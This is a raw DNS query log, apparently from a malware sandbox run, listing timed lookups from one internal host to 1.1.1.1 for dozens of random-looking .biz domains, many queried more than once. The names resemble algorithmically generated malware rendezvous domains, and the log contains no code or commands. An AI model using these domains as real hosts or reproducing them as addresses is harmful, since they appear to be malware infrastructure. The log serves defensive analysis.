                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.313538074 CET192.168.2.71.1.1.10x48a1Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.503686905 CET192.168.2.71.1.1.10x9d7Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.680766106 CET192.168.2.71.1.1.10xc60aStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:53.552577972 CET192.168.2.71.1.1.10x3aa3Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.153256893 CET192.168.2.71.1.1.10x2c0eStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.833998919 CET192.168.2.71.1.1.10xc2a8Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.043531895 CET192.168.2.71.1.1.10x8767Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.684740067 CET192.168.2.71.1.1.10xbcdeStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.327790022 CET192.168.2.71.1.1.10xacb5Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.376208067 CET192.168.2.71.1.1.10xb5d2Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.238729954 CET192.168.2.71.1.1.10xe248Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:57.805433035 CET192.168.2.71.1.1.10xd22Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:58.230245113 CET192.168.2.71.1.1.10x31c4Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.038480997 CET192.168.2.71.1.1.10xf46aStandard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:59.715106010 CET192.168.2.71.1.1.10x8df8Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.388045073 CET192.168.2.71.1.1.10xaaa9Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:00.700021029 CET192.168.2.71.1.1.10x332Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.085287094 CET192.168.2.71.1.1.10xf2daStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:01.093523979 CET192.168.2.71.1.1.10x56dcStandard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.393244028 CET192.168.2.71.1.1.10x1164Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:02.554713964 CET192.168.2.71.1.1.10x712cStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.066330910 CET192.168.2.71.1.1.10x5d30Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:03.239674091 CET192.168.2.71.1.1.10x97c2Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.061347961 CET192.168.2.71.1.1.10x7d75Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.202946901 CET192.168.2.71.1.1.10xebc7Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.592974901 CET192.168.2.71.1.1.10x1f14Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.904050112 CET192.168.2.71.1.1.10x2ecStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.098073006 CET192.168.2.71.1.1.10xa2f0Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.817307949 CET192.168.2.71.1.1.10x4ff7Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.421506882 CET192.168.2.71.1.1.10x22b7Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.667074919 CET192.168.2.71.1.1.10xec25Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.367508888 CET192.168.2.71.1.1.10x9055Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.586687088 CET192.168.2.71.1.1.10x6dbcStandard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.270189047 CET192.168.2.71.1.1.10x618Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.372019053 CET192.168.2.71.1.1.10x9d14Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.158437967 CET192.168.2.71.1.1.10xc56aStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.239902973 CET192.168.2.71.1.1.10x6664Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.029144049 CET192.168.2.71.1.1.10x99cbStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.085146904 CET192.168.2.71.1.1.10x321bStandard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.941771030 CET192.168.2.71.1.1.10x45c2Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.634742022 CET192.168.2.71.1.1.10x2757Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.740525007 CET192.168.2.71.1.1.10x8e44Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.322921038 CET192.168.2.71.1.1.10x6ea1Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.334281921 CET192.168.2.71.1.1.10x4723Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.596249104 CET192.168.2.71.1.1.10x2a62Standard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.758394003 CET192.168.2.71.1.1.10x9a88Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.099328995 CET192.168.2.71.1.1.10x7cf1Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.465641975 CET192.168.2.71.1.1.10xc779Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.934812069 CET192.168.2.71.1.1.10x2bdcStandard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.169683933 CET192.168.2.71.1.1.10x6becStandard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.857629061 CET192.168.2.71.1.1.10x66d7Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.880137920 CET192.168.2.71.1.1.10x66d7Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.126230955 CET192.168.2.71.1.1.10xfd9fStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.146985054 CET192.168.2.71.1.1.10xfd9fStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.839443922 CET192.168.2.71.1.1.10xdb49Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.584146976 CET192.168.2.71.1.1.10xff2aStandard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.608921051 CET192.168.2.71.1.1.10xb7adStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.445046902 CET192.168.2.71.1.1.10xc6a7Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.136277914 CET192.168.2.71.1.1.10xf26Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.215051889 CET192.168.2.71.1.1.10x28eStandard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.247294903 CET192.168.2.71.1.1.10x28eStandard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.011148930 CET192.168.2.71.1.1.10x251bStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.839175940 CET192.168.2.71.1.1.10xf2ebStandard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.883306026 CET192.168.2.71.1.1.10x13edStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.694978952 CET192.168.2.71.1.1.10x6491Standard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.892904997 CET192.168.2.71.1.1.10x9be0Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.556070089 CET192.168.2.71.1.1.10x3bceStandard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.758970976 CET192.168.2.71.1.1.10xc094Standard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.051883936 CET192.168.2.71.1.1.10x7644Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.245014906 CET192.168.2.71.1.1.10x4b40Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.550003052 CET192.168.2.71.1.1.10x17c2Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.702708006 CET192.168.2.71.1.1.10xd98eStandard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.398457050 CET192.168.2.71.1.1.10xbde7Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.399523020 CET192.168.2.71.1.1.10x53eStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.087512016 CET192.168.2.71.1.1.10xbe96Standard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.089627028 CET192.168.2.71.1.1.10xde75Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.813127041 CET192.168.2.71.1.1.10xed05Standard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.583060026 CET192.168.2.71.1.1.10xaec3Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.268332958 CET192.168.2.71.1.1.10x1a92Standard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.286505938 CET192.168.2.71.1.1.10x1a92Standard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.371397018 CET192.168.2.71.1.1.10x3ff2Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.395946026 CET192.168.2.71.1.1.10x3ff2Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.164616108 CET192.168.2.71.1.1.10x3d62Standard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.165191889 CET192.168.2.71.1.1.10x777cStandard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.067120075 CET192.168.2.71.1.1.10xbeedStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.670351982 CET192.168.2.71.1.1.10x6e49Standard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.933516026 CET192.168.2.71.1.1.10xbe2bStandard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.558624983 CET192.168.2.71.1.1.10x2447Standard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.420573950 CET192.168.2.71.1.1.10xdb83Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.918647051 CET192.168.2.71.1.1.10xc878Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.217933893 CET192.168.2.71.1.1.10xbcfStandard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.615261078 CET192.168.2.71.1.1.10xc57eStandard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.646121979 CET192.168.2.71.1.1.10xc57eStandard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.085629940 CET192.168.2.71.1.1.10xb0b3Standard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.481383085 CET192.168.2.71.1.1.10x5d00Standard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.955117941 CET192.168.2.71.1.1.10x7b10Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.630703926 CET192.168.2.71.1.1.10xc149Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.952658892 CET192.168.2.71.1.1.10xaceeStandard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.498167992 CET192.168.2.71.1.1.10x13d8Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.506052971 CET192.168.2.71.1.1.10xdbc9Standard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.985797882 CET192.168.2.71.1.1.10x4027Standard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.360524893 CET192.168.2.71.1.1.10x42faStandard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.718599081 CET192.168.2.71.1.1.10x5960Standard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.065766096 CET192.168.2.71.1.1.10x3dd5Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.932074070 CET192.168.2.71.1.1.10x339bStandard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.196856022 CET192.168.2.71.1.1.10x695Standard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.063513994 CET192.168.2.71.1.1.10xe26bStandard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.583108902 CET192.168.2.71.1.1.10x26Standard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.451430082 CET192.168.2.71.1.1.10x25cdStandard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.530579090 CET192.168.2.71.1.1.10x54bfStandard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.552273035 CET192.168.2.71.1.1.10x54bfStandard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.311122894 CET192.168.2.71.1.1.10xd363Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.132097006 CET192.168.2.71.1.1.10xc543Standard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.991430998 CET192.168.2.71.1.1.10x3ebStandard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.688134909 CET192.168.2.71.1.1.10x727eStandard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.204539061 CET192.168.2.71.1.1.10xf3c7Standard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.549683094 CET192.168.2.71.1.1.10xa0edStandard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.557477951 CET192.168.2.71.1.1.10x118fStandard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.073793888 CET192.168.2.71.1.1.10x1f12Standard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.407421112 CET192.168.2.71.1.1.10xff25Standard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.758795977 CET192.168.2.71.1.1.10xb959Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.103833914 CET192.168.2.71.1.1.10x6424Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.480915070 CET192.168.2.71.1.1.10xa007Standard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.959681034 CET192.168.2.71.1.1.10xf39Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.568980932 CET192.168.2.71.1.1.10x3f94Standard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.809674025 CET192.168.2.71.1.1.10x56aeStandard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.265484095 CET192.168.2.71.1.1.10x28d2Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.654738903 CET192.168.2.71.1.1.10xb258Standard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.116975069 CET192.168.2.71.1.1.10x29Standard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.510680914 CET192.168.2.71.1.1.10xd312Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.799671888 CET192.168.2.71.1.1.10x51b5Standard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:55.658502102 CET192.168.2.71.1.1.10xd6ddStandard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.009767056 CET192.168.2.71.1.1.10xe726Standard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.517498016 CET192.168.2.71.1.1.10xce04Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.993660927 CET192.168.2.71.1.1.10x2b7eStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.416582108 CET192.168.2.71.1.1.10xa417Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.680763006 CET192.168.2.71.1.1.10x4589Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.376110077 CET192.168.2.71.1.1.10xc2Standard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.889673948 CET192.168.2.71.1.1.10x5d4Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.251856089 CET192.168.2.71.1.1.10x4130Standard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:59.933310032 CET192.168.2.71.1.1.10xa224Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:00.563884020 CET192.168.2.71.1.1.10xe48dStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.126430035 CET192.168.2.71.1.1.10xab29Standard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.256401062 CET192.168.2.71.1.1.10xc6adStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.834011078 CET192.168.2.71.1.1.10x3418Standard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.694418907 CET192.168.2.71.1.1.10xa6e2Standard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.725127935 CET192.168.2.71.1.1.10x828fStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.731010914 CET192.168.2.71.1.1.10xa774Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.732795954 CET192.168.2.71.1.1.10x27aeStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.589370966 CET192.168.2.71.1.1.10xeeaeStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.227632046 CET192.168.2.71.1.1.10x79bdStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.236211061 CET192.168.2.71.1.1.10xc74dStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.245189905 CET192.168.2.71.1.1.10x7e9eStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.090101004 CET192.168.2.71.1.1.10xa513Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
